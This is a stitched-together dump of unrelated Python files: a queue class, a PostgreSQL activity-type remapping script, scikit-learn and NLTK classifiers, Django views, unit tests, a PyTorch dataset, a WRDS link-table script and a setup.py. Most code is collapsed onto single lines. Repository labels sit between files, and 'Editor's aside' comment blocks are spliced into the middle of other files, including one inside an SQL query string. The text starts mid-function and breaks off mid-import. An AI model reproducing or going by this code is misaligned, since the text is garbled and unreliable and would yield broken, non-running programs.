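    t_0 = rng.integers(0, len(frames) - actual_seq_len + 1)
    window = frames[t_0:t_0 + actual_seq_len]   # intermediary frames kept, as in the script
    return window, window[::subsampling]        # the subsampled view has exactly seq_len frames


# Example: extract_window(np.arange(100), seq_len=5, subsampling=8,
#          rng=np.random.default_rng(42))[1] has exactly 5 elements.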
__init__(self): self.instack=[] self.outstack=[] def enque(self,ele): self.instack.append(ele) def deque(self): if self.outstack==[]: while self.instack: self.outstack.append(self.instack.pop()) return self.outstack.pop() items=queue() for i in range(5): items.enque(i) items.enque(15) print(items.instack) print(items.deque()) print(items.outstack) update_project_eng.py from UnoCPI import sqlfiles,settings import psycopg2 import os sql = sqlfiles global connection global cursor try: connection = psycopg2.connect(user=settings.DATABASES['default']['USER'], password=settings.DATABASES['default']['PASSWORD'], host=settings.DATABASES['default']['HOST'], port=settings.DATABASES['default']['PORT'], database=settings.DATABASES['default']['NAME'], sslmode="require") if connection: print("Postgres SQL Database successful connection") cursor = connection.cursor() print("Executing Community Partner status inactive") #UPDATE Community partner to show status 'Inactive' from newly added Partner Status Table activityTypeDict_SL = [] activityTypeDict_SL.append({'oldValue':'Meeting / Gathering','newValue':'Other'}) activityTypeDict_SL.append({'oldValue':'Course','newValue':'Course'}) activityTypeDict_SL.append({'oldValue':'Unpaid Services','newValue':'Other'}) activityTypeDict_SL.append({'oldValue':'General Activity','newValue':'Course'}) activityTypeDict_SL.append({'oldValue':'Event / Exhibit / Performance','newValue':'Course'}) for x in activityTypeDict_SL: print(x['oldValue'],x['newValue']) query = "update projects_project set activity_type_id = \ (select a.id from projects_activitytype as a where a.name = '"+x['newValue']+"') \ where engagement_type_id = \ (select e.id from projects_engagementtype as e where e.name = 'Service Learning') \ and activity_type_id = \ (select c.id from projects_activitytype as c where c.name = '"+x['oldValue']+"')" print('query--',query) cursor.execute(query) connection.commit() activityTypeDict_AH = [] activityTypeDict_AH.append({"oldValue":'Unpaid Services',"newValue":'Other'}) activityTypeDict_AH.append({"oldValue":'Course',"newValue":'Other'}) activityTypeDict_AH.append({"oldValue":'Event / Exhibit / Performance',"newValue":'Other'}) activityTypeDict_AH.append({"oldValue":'Capstone',"newValue":'Other'}) activityTypeDict_AH.append({"oldValue":'Workshop',"newValue":'Other'}) activityTypeDict_AH.append({"oldValue":'Internships',"newValue":'Other'}) for x in activityTypeDict_AH: print(x['oldValue'],x['newValue']) query_AH = "update projects_project set activity_type_id = \ (select a.id from projects_activitytype as a where a.name = '"+x['newValue']+"') \ where engagement_type_id = \ (select e.id from projects_engagementtype as e where e.name = 'Access to Higher Education') \ and activity_type_id = \ (select c.id from projects_activitytype as c where c.name = '"+x['oldValue']+"')" print('query--',query_AH) cursor.execute(query_AH) connection.commit() activityTypeDict_CM = [] activityTypeDict_CM.append({"oldValue":'Unpaid Services',"newValue":'Other'}) activityTypeDict_CM.append({"oldValue":'Course',"newValue":'Other'}) activityTypeDict_CM.append({"oldValue":'General Activity',"newValue":'Other'}) activityTypeDict_CM.append({"oldValue":'Contract Services',"newValue":'Other'}) activityTypeDict_CM.append({"oldValue":'Training / Workshop / Presentation',"newValue":'Other'}) activityTypeDict_CM.append({"oldValue":'Event / Exhibit / Performance',"newValue":'Other'}) for x in activityTypeDict_CM: print(x['oldValue'],x['newValue']) query_CM = "update projects_project set 
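# Editor's aside (illustration only): the two-stack queue above has its terminology
# reversed in the comment -- a queue is FIFO and the stacks are LIFO -- and its deque()
# raises IndexError when called while both stacks are empty. A corrected standalone
# sketch of the same amortised O(1) technique:
class TwoStackQueue:
    def __init__(self):
        self.instack = []    # receives new elements
        self.outstack = []   # holds elements in dequeue order

    def enqueue(self, ele):
        self.instack.append(ele)

    def dequeue(self):
        if not self.outstack:
            # Reverse the in-stack only when the out-stack runs dry (amortised O(1))
            while self.instack:
                self.outstack.append(self.instack.pop())
        if not self.outstack:
            raise IndexError('dequeue from empty queue')
        return self.outstack.pop()


# Example: q = TwoStackQueue(); q.enqueue(1); q.enqueue(2); q.dequeue() -> 1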
activity_type_id = \ (select a.id from projects_activitytype as a where a.name = '"+x['newValue']+"') \ where engagement_type_id = \ (select e.id from projects_engagementtype as e where e.name = 'Community-Based Learning') \ and activity_type_id = \ (select c.id from projects_activitytype as c where c.name = '"+x['oldValue']+"')" print('query--',query_CM) cursor.execute(query_CM) connection.commit() activityTypeDict_ER = [] activityTypeDict_ER.append({"oldValue":'Unpaid Services',"newValue":'Other'}) activityTypeDict_ER.append({"oldValue":'Course',"newValue":'Other'}) activityTypeDict_ER.append({"oldValue":'Contract Services',"newValue":'Other'}) activityTypeDict_ER.append({"oldValue":'Mentoring',"newValue":'Other'}) activityTypeDict_ER.append({"oldValue":'Workshop',"newValue":'Other'}) activityTypeDict_ER.append({"oldValue":'Internships',"newValue":'Other'}) for x in activityTypeDict_ER: print(x['oldValue'],x['newValue']) query_ER = "update projects_project set activity_type_id = \ (select a.id from projects_activitytype as a where a.name = '"+x['newValue']+"') \ where engagement_type_id = \ (select e.id from projects_engagementtype as e where e.name = 'Engaged Research') \ and activity_type_id = \ (select c.id from projects_activitytype as c where c.name = '"+x['oldValue']+"')" print('query--',query_ER) cursor.execute(query_ER) connection.commit() activityTypeDict_KR = [] activityTypeDict_KR.append({"oldValue":'General Activity',"newValue":'Other'}) activityTypeDict_KR.append({"oldValue":'Course',"newValue":'Other'}) activityTypeDict_KR.append({"oldValue":'Meeting/Gathering',"newValue":'Community-oriented lecture/event'}) activityTypeDict_KR.append({"oldValue":'Unpaid Services',"newValue":'Other'}) activityTypeDict_KR.append({"oldValue":'Event / Exhibit / Performance',"newValue":'Community-oriented lecture/event'}) activityTypeDict_KR.append({"oldValue":'Contract Services',"newValue":'Specialized Service Contract'}) activityTypeDict_KR.append({"oldValue":'Training / Workshop / Presentation',"newValue":'Workshop'}) activityTypeDict_KR.append({"oldValue":'Service Activity',"newValue":'Workshop'}) activityTypeDict_KR.append({"oldValue":'Student Research',"newValue":'Workshop'}) for x in activityTypeDict_KR: print(x['oldValue'],x['newValue']) query_KR = "update projects_project set activity_type_id = \ (select a.id from projects_activitytype as a where a.name = '"+x['newValue']+"') \ where engagement_type_id = \ (select e.id from projects_engagementtype as e where e.name = 'Knowledge and Resource Sharing') \ and activity_type_id = \ (select c.id from projects_activitytype as c where c.name = '"+x['oldValue']+"')" print('query--',query_KR) cursor.execute(query_KR) connection.commit() activityTypeDict_VL = [] activityTypeDict_VL.append({"oldValue":'Unpaid Services',"newValue":'Service Activity'}) activityTypeDict_VL.append({"oldValue":'Course',"newValue":'Other'}) activityTypeDict_VL.append({"oldValue":'General Activity',"newValue":'Service Activity'}) activityTypeDict_VL.append({"oldValue":'Contract Services',"newValue":'Other'}) activityTypeDict_VL.append({"oldValue":'Workshop',"newValue":'Other'}) activityTypeDict_VL.append({"oldValue":'Training / Workshop / Presentation',"newValue":'Other'}) activityTypeDict_VL.append({"oldValue":'Meeting / Gathering',"newValue":'Other'}) for x in activityTypeDict_VL: print(x['oldValue'],x['newValue']) query_VL = "update projects_project set activity_type_id = \ (select a.id from projects_activitytype as a where a.name = '"+x['newValue']+"') \ where 
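# Editor's aside (illustration only): the UPDATE statements above are assembled by string
# concatenation. psycopg2 also accepts the activity-type and engagement-type names as
# bound parameters, which avoids quoting problems. A sketch of one such update; the
# cursor and connection are assumed to exist as in the script above, and the helper name
# is hypothetical:
REMAP_SQL = """
    UPDATE projects_project
       SET activity_type_id = (SELECT a.id FROM projects_activitytype AS a WHERE a.name = %(new)s)
     WHERE engagement_type_id = (SELECT e.id FROM projects_engagementtype AS e WHERE e.name = %(engagement)s)
       AND activity_type_id = (SELECT c.id FROM projects_activitytype AS c WHERE c.name = %(old)s)
"""


def remap_activity_types(cursor, connection, engagement, mapping):
    """mapping: list of {'oldValue': ..., 'newValue': ...} dicts, as used above."""
    for entry in mapping:
        cursor.execute(REMAP_SQL, {'new': entry['newValue'],
                                   'engagement': engagement,
                                   'old': entry['oldValue']})
    connection.commit()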
engagement_type_id = \ (select e.id from projects_engagementtype as e where e.name = 'Volunteering') \ and activity_type_id = \ (select c.id from projects_activitytype as c where c.name = '"+x['oldValue']+"')" print('query--',query_VL) cursor.execute(query_VL) connection.commit() except (psycopg2.Error) as error: print("Error while connecting to Postgres SQL", error) # finally: # # closing database connection. # if connection: # connection.commit() # # drop all_projects_start_and_end_date temp table # cursor.execute(sql.drop_temp_table_all_projects_start_and_end_dates_sql) cursor.close() connection.close() print("Postgres SQL connection is closed")# import libraries import sys import pandas as pd import numpy as np from sqlalchemy import create_engine import nltk nltk.download(['punkt', 'wordnet', 'stopwords']) from nltk.tokenize import word_tokenize from nltk.corpus import stopwords from nltk.stem import WordNetLemmatizer import re from sklearn.datasets import make_multilabel_classification from sklearn.multioutput import MultiOutputClassifier from sklearn.neighbors import KNeighborsClassifier from sklearn.pipeline import Pipeline from sklearn.metrics import confusion_matrix, classification_report, accuracy_score from sklearn.model_selection import train_test_split from sklearn.ensemble import RandomForestClassifier from sklearn.feature_extraction.text import CountVectorizer, TfidfTransformer from sklearn.model_selection import GridSearchCV import pickle def load_data(database_filepath): ''' This function loads data from a database into a DataFrame, then separates the categories part (X), the messages part (y) and the category labels (category_names) and returns them. Args: database_filepath (str) Returns: X (2d numpy array) - categories y (1d numpy array) - messages category_names (list of str) ''' # load data from database engine = create_engine('sqlite:///{}'.format(database_filepath)) df = pd.read_sql('df', engine) # extract category names df_y = df.iloc[:,4:] category_names = df_y.columns.tolist() # extract X and y df_X = df['message'] X = df_X y = df_y return X, y, category_names def tokenize(text): ''' Args: text (str) - text from a text message Returns: clean_tokens (list of str) - list where each item is a word; tokenized and cleaned ''' # replace urls with string 'urlplaceholder' url_regex = 'http[s]?://(?:[a-zA-Z]|[0-9]|[$-_@.&+]|[!*\(\),]|(?:%[0-9a-fA-F][0-9a-fA-F]))+' detected_urls = re.findall(url_regex, text) for url in detected_urls: text = text.replace(url, "urlplaceholder") # normalize text text = re.sub(r"[^a-zA-Z0-9]", " ", text.lower()) # tokenize text tokens = word_tokenize(text) # remove stopwords tokens = [token for token in tokens if token not in stopwords.words("english")] # lemmatize tokens lemmatizer = WordNetLemmatizer() clean_tokens = [] for tok in tokens: clean_tok = lemmatizer.lemmatize(tok).strip() clean_tokens.append(clean_tok) return clean_tokens def build_model(): pipe = Pipeline(steps = [ ('vect', CountVectorizer(tokenizer=tokenize)), ('tfidf', TfidfTransformer()), ('clf', MultiOutputClassifier(RandomForestClassifier())), ]) # Initializing parameters for Grid search parameters = {} parameters['clf__estimator__n_estimators'] = [10, 50] # GridSearch Object with pipeline and parameters cv = GridSearchCV(pipe, param_grid=parameters, cv=2, verbose=10) return cv def evaluate_model(cv, X_test, y_test, category_names): """ Function to evaluate model """ # Predict results of X_test y_pred = cv.predict(X_test) # Converting both y_pred and Y_test into DataFrames 
y_pred = pd.DataFrame(y_pred, columns=category_names) y_test = pd.DataFrame(y_test, columns=category_names) # Print classification report and accuracy with respect to each column for c in category_names: print(c, classification_report(y_test[c].values, y_pred[c].values)) print("Accuracy of "+str(c)+": "+str(accuracy_score(y_test[c].values, y_pred[c].values))) def save_model(model, model_filepath): """ This function for saving the model """ # open the file pickle_out = open(model_filepath, "wb") # write model to it pickle.dump(model, pickle_out) # close pickle file pickle_out.close() def main(): if len(sys.argv) == 3: database_filepath, model_filepath = sys.argv[1:] print('Loading data...\n DATABASE: {}'.format(database_filepath)) X, y, category_names = load_data(database_filepath) X_train, X_test, y_train, y_test = train_test_split(X, y) print('Building model...') model = build_model() print('Training model...') model.fit(X_train, y_train) print('Evaluating model...') evaluate_model(model, X_test, y_test, category_names) print('Saving model...\n MODEL: {}'.format(model_filepath)) save_model(model, model_filepath) print('Trained model saved!') else: print('Please provide the filepath of the disaster messages database '\ 'as the first argument and the filepath of the pickle file to '\ 'save the model to as the second argument. \n\nExample: python '\ 'train_classifier.py ../data/DisasterResponse.db classifier.pkl') if __name__ == '__main__': main()kemmot/PyTasks import unittest import unittest.mock as mock import filters.tasknamefilter as tasknamefilter class TaskNameFilterTests(unittest.TestCase): def test_constructor_sets_name(self): target = tasknamefilter.TaskNameFilter(mock.Mock(), 'test') self.assertEqual('test', target.name) def test_is_match_returns_true_on_matching_name(self): mock_context = mock.Mock() task = mock.Mock() task.name = 'test' self.assertTrue(tasknamefilter.TaskNameFilter(mock_context, 'test').is_match(task)) def test_is_match_returns_false_on_non_matching_index(self): mock_context = mock.Mock() task = mock.Mock() task.name = 'woble' self.assertFalse(tasknamefilter.TaskNameFilter(mock_context, 'test').is_match(task)) def test_is_match_returns_true_when_name_contains_same_case(self): mock_context = mock.Mock() task = mock.Mock() task.name = 'onetesttwo' self.assertTrue(tasknamefilter.TaskNameFilter(mock_context, 'test').is_match(task)) def test_is_match_returns_true_when_name_contains_different_case(self): mock_context = mock.Mock() task = mock.Mock() task.name = 'oneTESTtwo' self.assertTrue(tasknamefilter.TaskNameFilter(mock_context, 'test').is_match(task)) class TaskNameFilterParserTests(unittest.TestCase): def test_parse_none_returns_none(self): mock_context = mock.Mock() target = tasknamefilter.TaskNameFilterParser().parse(mock_context, None) self.assertIsNone(target) def test_parse_empty_string_returns_none(self): mock_context = mock.Mock() target = tasknamefilter.TaskNameFilterParser().parse(mock_context, '') self.assertIsNone(target) def test_parse_non_empty_string_returns_filter(self): mock_context = mock.Mock() target = tasknamefilter.TaskNameFilterParser().parse(mock_context, 'test') self.assertIsInstance(target, tasknamefilter.TaskNameFilter) self.assertEqual('test', target.name) def test_parse_strips_forward_slashes(self): mock_context = mock.Mock() target = tasknamefilter.TaskNameFilterParser().parse(mock_context, '/test/') self.assertIsInstance(target, tasknamefilter.TaskNameFilter) self.assertEqual('test', target.name) 10-100 # Copyright (c) Facebook, Inc. 
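# Editor's aside (illustration only): evaluate_model above scores the multi-output
# classifier one category column at a time. A compact standalone sketch of that
# per-column reporting on toy arrays (the category names here are hypothetical):
import numpy as np
import pandas as pd
from sklearn.metrics import accuracy_score, classification_report


def report_per_column(y_true, y_pred, category_names):
    y_true = pd.DataFrame(y_true, columns=category_names)
    y_pred = pd.DataFrame(y_pred, columns=category_names)
    for c in category_names:
        print(c, classification_report(y_true[c].values, y_pred[c].values))
        print('Accuracy of {}: {}'.format(c, accuracy_score(y_true[c].values, y_pred[c].values)))


# Example with two categories and three samples:
# report_per_column(np.array([[1, 0], [0, 1], [1, 1]]),
#                   np.array([[1, 0], [0, 0], [1, 1]]),
#                   ['water', 'food'])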
and its affiliates. # # This source code is licensed under the MIT license found in the # LICENSE file in the root directory of this source tree. import torch from torch.utils.data import Dataset from listops.data_preprocessing import load_listops_data class ListOpsDataset(Dataset): def __init__(self, data_path, vocab_path, max_len=float("inf")): super().__init__() self.data, idx_to_word, word_to_idx = load_listops_data(data_path, vocab_path, max_len) self.vocab_size = len(idx_to_word) self.label_size = 10 def __getitem__(self, index): e = self.data[index] return e["label"], e["tokens"] def __len__(self): return len(self.data) @staticmethod def collate_fn(data): labels, tokens = zip(*data) labels = torch.tensor(labels, dtype=torch.long) max_len = max(len(e) for e in tokens) mask = torch.zeros((len(tokens), max_len), dtype=torch.float32) for idx, e in enumerate(tokens): mask[idx, :len(e)] = 1 tokens = [e + [0] * (max_len - len(e)) for e in tokens] tokens = torch.tensor(tokens, dtype=torch.long) return labels, tokens, mask """ Functions for when the UI sends JSON requests to route to TA2s as gRPC calls - Right now this code is quite redundant. Wait for integration to factor it out, e.g. lots may change--including the "req_" files being part of a separate service """ import http import json from collections import OrderedDict from django.shortcuts import render from django.http import JsonResponse from django.views.decorators.csrf import csrf_exempt from tworaven_apps.ta3_search.forms import MessageListenerForm from tworaven_apps.ta3_search.message_util import MessageUtil, KEY_MESSSAGE from tworaven_apps.utils.view_helper import get_session_key from django.contrib.auth.decorators import login_required from tworaven_apps.utils.view_helper import get_request_body_as_json @login_required @csrf_exempt def view_end_ta3_search(request): """End the D3M search via the UI""" success, info_dict = get_request_body_as_json(request) if not success: return JsonResponse(dict(success=False, message="No JSON info found in request.")) if not KEY_MESSSAGE in info_dict: return JsonResponse(\ dict(success=False, message="No '%s' found in request." % KEY_MESSSAGE)) if not 'is_success' in info_dict: return JsonResponse(dict(success=False, message="No 'is_success' found in request.")) is_success = info_dict['is_success'] if not is_success in [True, False]: return JsonResponse(dict(success=False, message="'is_success' must be a boolean (true/false)")) MessageUtil.send_shutdown_message(info_dict[KEY_MESSSAGE], is_success=is_success) # open post commands + message # send appropriate message to the listeners return JsonResponse(dict(success=True, message='shutdown message sent')) @login_required @csrf_exempt def view_send_reviewer_message(request): """Send a message to the console""" success, info_dict = get_request_body_as_json(request) if not success: return JsonResponse(dict(success=False, message="No JSON info found in request.")) if not KEY_MESSSAGE in info_dict: return JsonResponse(\ dict(success=False, message="No '%s' found in request." 
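# Editor's aside (illustration only): collate_fn above pads variable-length token lists to
# the batch maximum and returns a float mask over the real positions. Because it is a
# @staticmethod that never touches dataset state, it can be exercised on toy data,
# assuming the ListOpsDataset class defined above is in scope:
# toy_batch = [(3, [5, 7, 9]), (1, [2, 4])]
# labels, tokens, mask = ListOpsDataset.collate_fn(toy_batch)
# tokens -> tensor([[5, 7, 9], [2, 4, 0]])   (second row padded with 0)
# mask   -> tensor([[1., 1., 1.], [1., 1., 0.]])
# labels -> tensor([3, 1])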
% KEY_MESSSAGE)) msg_to_send = info_dict.get(KEY_MESSSAGE) MessageUtil.send_message(msg_to_send) return JsonResponse(dict(success=True, message='message sent: %s' % msg_to_send)) @csrf_exempt def view_register_listener(request): """register a web url for messages related to ta3_search""" if request.method == 'GET': # validate the request ml_form = MessageListenerForm(request.GET) if ml_form.is_valid(): # Looks good, get the listener # new_listener, created = ml_form.get_listener() # create user message # user_msg = 'Listener url registered: %s' % new_listener.web_url if not created: user_msg = '%s. Note: this listener already existed.' % \ user_msg user_msg = '%s (updated: %s)' % (user_msg, new_listener.modified) # send message to listener--to print to console # MessageUtil.send_message_to_listener(\ user_msg, new_listener) # respond to view request # return JsonResponse(dict(success=True, message=user_msg)) else: user_msg = 'Listener not registered. Errors found.' return JsonResponse(dict(success=False, message=user_msg, details=ml_form.errors), status=http.HTTPStatus.BAD_REQUEST) user_msg = ('Listener not registered. Please submit' ' a GET with a "web_url" attribute.') return JsonResponse(dict(success=False, message=user_msg), status=http.HTTPStatus.BAD_REQUEST) from django.conf import settings from django.core.management import call_command from django.core.management.base import BaseCommand from ...models import Privilege, SlackAccess class Command(BaseCommand): def handle(*args, **opts): for slug, title, team_name in [ ("tracon-slack", "Traconin Slack-yhteisö", "traconfi"), ("desuslack", "Desuconin Slack-yhteisö", "desucon"), ]: privilege, created = Privilege.objects.get_or_create( slug=slug, defaults=dict( title=title, description="""TODO WRITE ME""".strip().format(default_from_email=settings.DEFAULT_FROM_EMAIL), request_success_message="", grant_code="access.privileges:invite_to_slack", ), ) slack_access, created = SlackAccess.objects.get_or_create( privilege=privilege, defaults=dict( team_name=team_name, ), ) theodorachu/ihavenewsforyou1-10 import random import numpy as np from corpusInterface import CorpusInterface from nltk.classify import NaiveBayesClassifier from nltk.classify.scikitlearn import SklearnClassifier from sklearn.linear_model import LogisticRegression ARTICLE_FILE = 'newsArticles.json' corpusInterface = CorpusInterface() contents = corpusInterface.extractContent() left = [] right = [] center = [] for content in contents: label = content['bias'][6:] if label == 'Left' or label == 'Lean Left': left.append(content) elif label == 'Right' or label == 'Lean Right': right.append(content) elif label == 'Center' or label == 'Mixed': center.append(content) random.shuffle(left) random.shuffle(right) random.shuffle(center) # FEATURE EXTRACTOR: bag of words def word_feats(words): return dict([(word, True) for word in words]) # NAIVE BAYES left = [(word_feats(corpusInterface.rm_stop_and_punc(x['title'] + " " + x['text']).split(' ')), 'left') for x in left] right = [(word_feats(corpusInterface.rm_stop_and_punc(x['title'] + " " + x['text']).split(' ')), 'right') for x in right] center = [(word_feats(corpusInterface.rm_stop_and_punc(x['title'] + " " + x['text']).split(' ')), 'center') for x in center] # TRAIN trainfeats = left[:-20] + right[:-20] + center[:-20] #classifier = NaiveBayesClassifier.train(trainfeats) # NAIVE BAYES classifier = SklearnClassifier(LogisticRegression()).train(trainfeats) # TEST testfeats = [x[0] for x in (left[-20:] + right[-20:] + center[-20:])] total = 
len(testfeats) numLeftWrong = 0 numRightWrong = 0 numCenterWrong = 0 for i in xrange(len(testfeats)): predicted = classifier.classify(testfeats[i]) if i < 20 and predicted != 'left': numLeftWrong += 1 elif i >= 20 and i < 40 and predicted != 'right': numRightWrong += 1 elif i >= 40 and predicted != 'center': numCenterWrong += 1 totalWrong = numLeftWrong + numRightWrong + numCenterWrong print "Accuracy: (" + str(total - totalWrong) + "/" + str(total) + ") = " + str(float(total - totalWrong) / total) + '%' print "Left Accuracy: (" + str(20 - numLeftWrong) + "/" + str(20) + ")" print "Right Accuracy: (" + str(20 - numRightWrong) + "/" + str(20) + ")" print "Center Accuracy: (" + str(20 - numCenterWrong) + "/" + str(20) + ")"Bhaskers-Blu-Org2/tes-azure # coding: utf-8 # Copyright (c) Microsoft Corporation. # Licensed under the MIT license. from flask import Blueprint tesapi = Blueprint('tesapi', __name__, template_folder='templates') from . import api # noqa: F401 """ Tests for ComputedReaction. Some tests adapted from pymatgen. """ import pytest from pathlib import Path from monty.serialization import loadfn from rxn_network.reactions.computed import ComputedReaction TEST_FILES_PATH = Path(__file__).parent.parent / "test_files" ENTRIES_FILE = "yocl-namno2_rxn_entries.json.gz" @pytest.fixture(scope="session") def entries(): return loadfn(TEST_FILES_PATH / ENTRIES_FILE) @pytest.fixture(scope="session") def reactants(entries): return [entries["YOCl"], entries["NaMnO2"], entries["O2"]] @pytest.fixture(scope="session") def products(entries): return [entries["Y2Mn2O7"], entries["NaCl"]] @pytest.fixture(scope="session") def pre_balanced_rxn(reactants, products): """Returns a simple, pre-balanced computed reaction.""" coefficients = [-2, -2, -0.5, 1, 2] rxn = ComputedReaction( entries=reactants + products, coefficients=coefficients, ) return rxn @pytest.fixture(scope="session") def auto_balanced_rxn(reactants, products): """Returns the same iron oxidation reaction, after automatically balancing""" return ComputedReaction.balance( reactant_entries=reactants, product_entries=products ) def test_energy(pre_balanced_rxn, auto_balanced_rxn): expected_energy = -2.701048 assert pre_balanced_rxn.energy == pytest.approx(expected_energy) assert auto_balanced_rxn.energy == pytest.approx(expected_energy) def test_energy_per_atom(pre_balanced_rxn, auto_balanced_rxn): expected_energy_per_atom = -0.1800700 assert pre_balanced_rxn.energy_per_atom == pytest.approx(expected_energy_per_atom) assert auto_balanced_rxn.energy_per_atom == pytest.approx(expected_energy_per_atom) def test_energy_uncertainty(pre_balanced_rxn, auto_balanced_rxn): expected_energy_uncertainty = 0.0229486383 assert pre_balanced_rxn.energy_uncertainty == pytest.approx( expected_energy_uncertainty ) assert auto_balanced_rxn.energy_uncertainty == pytest.approx( expected_energy_uncertainty ) def test_energy_uncertainty_per_atom(pre_balanced_rxn, auto_balanced_rxn): expected_energy_uncertainty_per_atom = 0.0015299092 assert pre_balanced_rxn.energy_uncertainty_per_atom == pytest.approx( expected_energy_uncertainty_per_atom ) assert auto_balanced_rxn.energy_uncertainty_per_atom == pytest.approx( expected_energy_uncertainty_per_atom ) def test_copy(pre_balanced_rxn, auto_balanced_rxn): pre_balanced_rxn_copy = pre_balanced_rxn.copy() auto_balanced_rxn_copy = auto_balanced_rxn.copy() assert ( pre_balanced_rxn == auto_balanced_rxn == pre_balanced_rxn_copy == auto_balanced_rxn_copy ) def test_reverse(pre_balanced_rxn): pre_balanced_rxn_rev = 
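# Editor's aside (illustration only): the accuracy loop above is Python 2 (xrange, print
# statements). An equivalent Python 3 sketch of the same per-class error counting,
# assuming `classifier` and `testfeats` are built as above with 20 test examples per
# class ordered left / right / center:
def report_accuracy(classifier, testfeats, per_class=20):
    wrong = {'left': 0, 'right': 0, 'center': 0}
    order = ['left'] * per_class + ['right'] * per_class + ['center'] * per_class
    for feats, expected in zip(testfeats, order):
        if classifier.classify(feats) != expected:
            wrong[expected] += 1
    total = len(testfeats)
    total_wrong = sum(wrong.values())
    print("Accuracy: ({}/{}) = {:.3f}".format(total - total_wrong, total,
                                              (total - total_wrong) / total))
    for label in ('left', 'right', 'center'):
        print("{} Accuracy: ({}/{})".format(label.capitalize(), per_class - wrong[label], per_class))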
pre_balanced_rxn.reverse() assert pre_balanced_rxn.energy == -pre_balanced_rxn_rev.energy assert pre_balanced_rxn == pre_balanced_rxn_rev.reverse() #!/usr/bin/env python3 """ script: link_compustat_ibis.py author: date: Spring 2018 This script creates a mapping table between IBES and Compustat. It supports the following methods: - Link via CRSP - Link via S_SECURITY Notes: - Output can be specified manually or via argparse - References: [1] https://wrds-web.wharton.upenn.edu/wrds/support/Data/_010Linking%20Databases/_000Linking%20IBES%20and%20CRSP%20Data.cfm (WRDS tutorial on mapping IBES to CRSP) [2] https://wrds-web.wharton.upenn.edu/wrds/support/code_show.cfm?path=I-B-E-S/cibeslink.sas (WRDS SAS script mapping IBES to Compustat) [3] http://www.wrds.us/index.php/forum_wrds/viewthread/6/ (Additional clarifications from a forum post) """ import wrds import argparse import pandas as pd import os, sys def main(output_file, method): # Change working directory to path of script # This ensures that oufile is written to script directory if its not an absolute path os.chdir(os.path.dirname(os.path.realpath(sys.argv[0]))) # Connect to wrds db = wrds.Connection() # Execute method if method is None: # Nothing specifed crsp_method(db, output_file) elif method.upper() == 'GSEC': gsec_method(db, output_file) elif method.upper() == 'CRSP': crsp_method(db, output_file) else: print("Unknown method specified:", method) def gsec_method(db, output_file): """ This method uses the IBTIC variable from Compustat's G_SECURITY table to add the Compustat GVKEY to IBES See: https://wrds-web.wharton.upenn.edu/wrds/tools/variable.cfm?library_id=7&file_id=64675 """ # Get IBES data ibes = db.get_table(library='ibes', table='idsum', columns=['ticker', 'cusip', 'cname']) ibes.drop_duplicates(inplace=True) # Get G_SECURITY data gsec = db.get_table(library='comp', table='security', columns=['gvkey', 'ibtic']) gsec.drop_duplicates(inplace=True) # Link G_Security and foreign CRSP out = ibes.merge(gsec, left_on='ticker', right_on='ibtic') # Export complete table out.to_csv(output_file, index=False) def crsp_method(db, output_file): """ This function maps cusip in IBES to ncusip in CRSP (ignoring date because it's "of little benefit" [1]). It then maps CRSP Compustat via the permno found in ccmxpf_lnkhist ([2]). The resulting linktable contains the IBES Ticker, CUSIP, company name (CNAME) and Compustat GVKEY. """ # Get IBES data ibes = db.get_table(library='ibes', table='idsum', columns=['ticker', 'cusip', 'cname']) ibes.drop_duplicates(inplace=True) # Get CRSP data crsp = db.get_table(library='crsp', table='stocknames', columns=['permno', 'ncusip']) crsp.drop_duplicates(inplace=True) # Merge IBES and CRSP link1 = ibes.merge(crsp, left_on='cusip', right_on='ncusip') # Get Compustat-CRSP linktable link2 = db.get_table(library='crsp', table='ccmxpf_lnkhist', columns=['gvkey', 'lpermno', 'lpermco', 'linktype', 'linkprim']) # 'linkdt', 'linkenddt' link2 = link2[link2['linktype'].isin(['LC', 'LU'])] link2 = link2[link2['linkprim'].isin(['C', 'P'])] link2.drop(['linktype', 'linkprim'], axis=1, inplace=True) # Merge the two link tables out = link2.merge(link1, left_on='lpermno', right_on='permno') out.drop_duplicates(inplace=True) # Export complete table out.to_csv(output_file, index=False) if __name__ == '__main__': parser = argparse.ArgumentParser(description='Create link table between Compustat and IBES. WRDS login credentials are required. 
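# Editor's aside (illustration only): the CRSP method above is a two-step pandas merge --
# IBES cusip -> CRSP ncusip, then CRSP permno -> Compustat gvkey via the link history
# table. A toy, self-contained sketch of that chain with made-up identifiers:
import pandas as pd

ibes_toy = pd.DataFrame({'ticker': ['ABC'], 'cusip': ['12345678'], 'cname': ['Acme Corp']})
crsp_toy = pd.DataFrame({'permno': [10001], 'ncusip': ['12345678']})
linkhist_toy = pd.DataFrame({'gvkey': ['001234'], 'lpermno': [10001],
                             'linktype': ['LC'], 'linkprim': ['P']})

link1_toy = ibes_toy.merge(crsp_toy, left_on='cusip', right_on='ncusip')
linkhist_toy = linkhist_toy[linkhist_toy['linktype'].isin(['LC', 'LU'])
                            & linkhist_toy['linkprim'].isin(['C', 'P'])]
out_toy = (linkhist_toy.drop(columns=['linktype', 'linkprim'])
           .merge(link1_toy, left_on='lpermno', right_on='permno'))
# out_toy now carries ticker, cusip, cname and gvkey in one row per matched security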
') parser.add_argument('-o', '--output', help='Output file (csv)', required=True, type=str) # Output file arg parser.add_argument('-m', '--method', help='Method to use to create the link table. Options are "gsec" for the "G_SECURITY" table method, and "crsp" for the CRSP table method. Defaults to CRSP method', required=False, type=str) # Output file arg args = vars(parser.parse_args()) outfile = args['output'] method = args['method'] main(outfile, method) setup.py #!/usr/bin/python # -*- coding: utf8 -*- import os from setuptools import setup here = os.path.abspath(os.path.dirname(__file__)) install_requires = [ 'Django >=1.5,<1.7', 'requests >=2.2,<2.3', 'termcolor == 1.1.0', 'django-leaflet == 0.13.5', 'django-localeurl == 2.0.1', 'django-pjax == 1.2', 'easydict == 1.4', 'django_compressor == 1.3', 'django-ganalytics == 0.2', 'django-recaptcha == 0.0.9', 'landez == 2.2.0', 'BeautifulSoup == 3.2.1' ] setup( name='rando', version=open(os.path.join(here, 'VERSION')).read().strip(), author='', author_email='', url='http://makina-corpus.com', install_requires=install_requires ) 1-10 # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. from tests.beeswax.impala_beeswax import ImpalaBeeswaxException from tests.common.impala_test_suite import ImpalaTestSuite from tests.common.test_dimensions import create_single_exec_option_dimension from 